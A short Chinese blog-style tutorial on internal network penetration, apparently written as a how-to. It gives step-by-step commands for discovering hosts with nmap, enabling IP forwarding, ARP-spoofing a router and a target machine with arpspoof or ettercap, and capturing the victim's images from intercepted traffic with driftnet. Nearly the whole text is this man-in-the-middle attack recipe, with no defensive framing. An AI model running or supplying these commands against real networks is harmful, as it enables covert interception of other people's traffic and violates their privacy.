内网渗透

寻找目标主机

ifconfig

接下来扫描内网中的主机:

nmap -sP 172.17.171.0/24

使用以下命令来查看目标主机的操作系统信息:

nmap -O 172.17.171.21

进行arp欺骗,获取流量

开启流量转发功能 
使流量经过流程为:

内网渗透_第1张图片

A是路由器,B是攻击主机,C是目标主机。

1.首先开启流量转发功能:

echo 1 >> /proc/sys/net/ipv4/ip_forward

2.使用arpspoof/ettercap,选一个进行arp欺骗。获取从172.17.171.1(路由器) 到 172.17.171.21(目标机)的流量。

arpspoof -i eth0 -t 172.17.171.1 172.17.171.21

ettercap -T -q -M ARP /172.17.171.21// ///

3.打开另一个终端,使用driftnet进行流量监控,显示图片

driftnet -i eth0

你可能感兴趣的:(Security)